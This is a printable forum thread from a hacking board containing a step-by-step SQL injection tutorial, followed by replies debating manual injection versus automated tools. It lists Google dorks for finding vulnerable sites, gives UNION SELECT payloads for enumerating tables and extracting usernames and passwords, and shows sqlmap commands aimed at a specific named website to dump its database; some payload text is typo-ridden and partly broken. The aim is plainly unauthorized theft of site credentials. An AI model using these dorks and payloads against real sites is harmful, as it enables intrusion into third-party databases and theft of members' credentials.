Sinisterly
SQLi Tut + SQLmap! - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: SQLi Tut + SQLmap! (/Thread-SQLi-Tut-SQLmap)

SQLi Tut + SQLmap! - Adorapuff - 02-16-2013

Instinct and I are working on a tut.
I'm going to work on all the formatting here.

SQLi
What is SQLi?
SQLi is injecting a series of “custom” codes into a webpage to give you access to the database. You can get data such as admin user name and pass along with the usernames and passwords of the members of the website. SQLi is the most common and easiest method of “hacking” today.
Let’s get started.
List of dorks
Spoiler:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:lay_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:ageid=
inurl:games.php?id=
inurl:age.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
More can be found here http://pastebin.com/1c0mvpJJ

You are going to enter a dork on Google and put a ‘ after the ?id=x
If you get an error saying something along the lines of: You have an error in your SQL syntax… then the site is vulnerable.

Finding the # columns
At the end of the site enter
Code:
order by 5--
For example
url.com/index.php?id=1 order by 5—
If the page reloads go up for example.
url.com/index.php?id=1 order by 10
If you get an error go down.
You want to get to the one right below the first error.
So if order by 7 is error but 6 is not, 6 is the number of columns.

Finding the vulnerable columns
Since there are 6 columns you are going to go to enter
Code:
Union Select 1,2,3,4,5,6--
and a - after the = sym
url.com/index.php?id=-1 Union Select 1,2,3,4,5,6--
You have to put a - after =
You should get some numbers showing up on the page. Those are the vulnerable columns.

Getting The Version
Pick a vulnerable colum and replace it with
Code:
@@version

So an example ill use 2 as the vulnerable column
url.com/index.php?id=-1 Union Select 1, @@version,3,4,5,6--
or url.com/index.php?id=-1 Union Select 1, group_concat(@@version),3,4,5,6--
both work.
The result would be something along the lines of
Code:
5.1.37-1ubuntu5.5-log
the text doesn’t matter, but if the number is below 5 then it won’t work.

Getting The DB Name
Replace the vulnerable column with
Code:
concat(database())
This will get you the database name. Write it down.

Getting table name
Delete
Code:
concat(databse())
and replace it with
Code:
group_concat(table_name)
and before --put
Code:
FROM information_schema.tables WHERE table_schema=database()

Expample
url.com/index.php?id=-1 Union Select 1, group_concat(table_name),3,4,5,6 FROM information_schema.tables WHERE table_schema=database() --
Now you are going to get a list. Look for anything having to do with admin, login, users, anything that could potentially have usernames and passwords. Convert the table name of your choice to hex via a text to hex convertor.
Getting Column Names
Now replace
Code:
group_concat(table_name)
with
Code:
group_concat(column_name)
and replace
Code:
FROM information_schema.tables WHERE table_schema=database()--
with
Code:
FROM information_schema.columns WHERE table_name=”0xhex Here”
without quotes. You need the 0x directly before the hex, so no space.
Getting The Data
No if you picked the “right” column you should get something that says ID, Username, Password, sometimes, address, email and more.
Now replace
Code:
group_concat(column_name)
with the column(s) of your choice. If you want two columns you would have an 0x3a in between them with a comma after 0x3a for example
Code:
group_concat(username0x3a,password)
. You also have to replace
Code:
with   FROM information_schema.columns WHERE table_name=hexcharacters[/cdode] with [code]FROM DBName.tablename
– replace DBName with the databse name you got from the concat(database()) command earlier and tablename with the table name that you converted to hex, but you can use plain text for this one.

SQLmap

Quote:"sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

SQLmap is a tool that is getting used much because it does things much faster than manually. I'll prefer you know how to do a manual injection before you try this tool or else you won't learn anything.

You can download SQLmap here: http://sqlmap.org/

Let's get started!

Things you need:
-A website vulnerable to a SQLi injection!
-A brain
-Python installed

I assume you know how a basic SQLi injection works.

I'm running Linux so I'll explain how to do it in Linux. On windows it's bassicly the same except you have to add python ./sqlmap.py every time.

So I'm going to my SQLmap directory.
In my case it's
Code:
cd /home/instinct/SQLmap
picture:
Spoiler:
[Image: cg9sf5h.png]

Alright once we've found our vulnerable site

you want to get the databases in order to do this you have to use this command:
Code:
./sqlmap.py -u  http://senesco.com/newsitem.php?id=211 –dbs
The u means the it's going to give the site's URL.
The --dbs means it's going to fetch the databases.

Now once you'll have done that you'll get this screen:
picture:
Spoiler:
[Image: OeSjMp5.png]

Those are the databases.

We want to take a look in infofir_SE
In order to do that you'll have to use this command:
Code:
./sqlmap.py -u  http://senesco.com/newsitem.php?id=211 -D infofir_SE –tables
What does command does is getting the tables from the database
-D infofir_SE is the database where we want the tables from
--TABLES means it's going to get the tables.

Once you've done that you'll see something like this:
picture:
Spoiler:
[Image: ABv7Jws.png]

These are the tables.

Now for example we want to take a look in the table called ”sec”
In order to do this we'll have to use this command
Code:
./sqlmap.py -u  http://senesco.com/newsitem.php?id=211 -D infofir_SE -T sec –columns
-D infofir_SE is the database we want to extract the columns from.
-T sec is the table we want to extracht the columns from.
--columns get's the columns from the table called ' sec' ”-T sec”

Once you've done that you'll see this
picture:
Spoiler:
[Image: ay0m2XZ.png]

These are the columns.

Now to look what's inside the columns you have to use this command:
Code:
./sqlmap.py -u  http://senesco.com/newsitem.php?id=211 -D infofir_SE -T sec -C –dump
-C means the columns
--dump means getting the data and saving it to a file

The file will be saved to wherever your SQLmap folder is located and then “output” and search for the name of the site.

I'll hope you enjoyed this tutorial.

Devil Child
INST1NCT

Brought to you by The Goons!

RE: The Goons SQLi Tut - Slacker - 02-16-2013

Great Tutorial, I have something similar to this from people walking me through the steps, but this is still helpful.

RE: The Goons SQLi Tut + SQLmap! - Dismas - 02-16-2013

Not a bad tutorial. I notice in all the pictures I'm calling INST1NCT. Tongue

RE: The Goons SQLi Tut + SQLmap! - Charon - 02-16-2013

Great job Devil Child,

keep it up. Wink

RE: The Goons SQLi Tut + SQLmap! - BreShiE - 02-16-2013

Good tutorial, but I reckon you should delete the "sqlmap" tutorial. All skids that look at this will just be like "OH LOOK - FUCK THIS MANUAL SHIT - I HAZ TOOLZ". We should actually teach users how to execute SQL queries in the URL and not how to use tools to do it for us. Just my two cents.

RE: The Goons SQLi Tut + SQLmap! - Charon - 02-16-2013

(02-16-2013, 06:19 AM)BreShiE Wrote: Good tutorial, but I reckon you should delete the "sqlmap" tutorial. All skids that look at this will just be like "OH LOOK - FUCK THIS MANUAL SHIT - I HAZ TOOLZ". We should actually teach users how to execute SQL queries in the URL and not how to use tools to do it for us. Just my two cents.

I highly recommend to know the manual injection before using SQLmap. Although I have no problem people using SQLmap if they know what's happening about the scene. Because this tool just does it faster and more organized than what a manual injection could do.

RE: The Goons SQLi Tut + SQLmap! - BreShiE - 02-16-2013

(02-16-2013, 06:21 AM)INST1NCT Wrote:
(02-16-2013, 06:19 AM)BreShiE Wrote: Good tutorial, but I reckon you should delete the "sqlmap" tutorial. All skids that look at this will just be like "OH LOOK - FUCK THIS MANUAL SHIT - I HAZ TOOLZ". We should actually teach users how to execute SQL queries in the URL and not how to use tools to do it for us. Just my two cents.

I highly recommend to know the manual injection before using SQLmap. Although I have no problem people using SQLmap if they know what's happening about the scene. Because this tool just does it faster and more organized than what a manual injection could do.

Yes I know, this is why I use it myself, but I'm saying the kids in the scene now-a-days will just look for the quickest way to be a "h3cker" and not even bother learning about the subjects they're involved in. This is just personal preference, obviously you can do what you wish with this tutorial (@Devil Child) this is just my opinion.

RE: The Goons SQLi Tut + SQLmap! - Charon - 02-16-2013

(02-16-2013, 06:24 AM)BreShiE Wrote:
(02-16-2013, 06:21 AM)INST1NCT Wrote:
(02-16-2013, 06:19 AM)BreShiE Wrote: Good tutorial, but I reckon you should delete the "sqlmap" tutorial. All skids that look at this will just be like "OH LOOK - FUCK THIS MANUAL SHIT - I HAZ TOOLZ". We should actually teach users how to execute SQL queries in the URL and not how to use tools to do it for us. Just my two cents.

I highly recommend to know the manual injection before using SQLmap. Although I have no problem people using SQLmap if they know what's happening about the scene. Because this tool just does it faster and more organized than what a manual injection could do.

Yes I know, this is why I use it myself, but I'm saying the kids in the scene now-a-days will just look for the quickest way to be a "h3cker" and not even bother learning about the subjects they're involved in. This is just personal preference, obviously you can do what you wish with this tutorial (@Devil Child) this is just my opinion.

Well there are always going to be skid, I think you can't prevent them. I think you shouldn't care about the 'others' and with 'others' I mean the skiddies. It will always happen. Also you shouldn't point out Devil Child for the SQLmap part, I've written the SQLmap part, and like I've told you I didn't make it so skiddies will use it without knowing what's happening behind the scenes. Anyway let's stop discussing about this.

RE: The Goons SQLi Tut + SQLmap! - Adorapuff - 02-16-2013

(02-16-2013, 06:24 AM)BreShiE Wrote:
(02-16-2013, 06:21 AM)INST1NCT Wrote:
(02-16-2013, 06:19 AM)BreShiE Wrote: Good tutorial, but I reckon you should delete the "sqlmap" tutorial. All skids that look at this will just be like "OH LOOK - FUCK THIS MANUAL SHIT - I HAZ TOOLZ". We should actually teach users how to execute SQL queries in the URL and not how to use tools to do it for us. Just my two cents.

I highly recommend to know the manual injection before using SQLmap. Although I have no problem people using SQLmap if they know what's happening about the scene. Because this tool just does it faster and more organized than what a manual injection could do.

Yes I know, this is why I use it myself, but I'm saying the kids in the scene now-a-days will just look for the quickest way to be a "h3cker" and not even bother learning about the subjects they're involved in. This is just personal preference, obviously you can do what you wish with this tutorial (@Devil Child) this is just my opinion.

Breshie, I wrote the first part of the tutorial. I have no intention to use SQLMap until I fully master manual injection.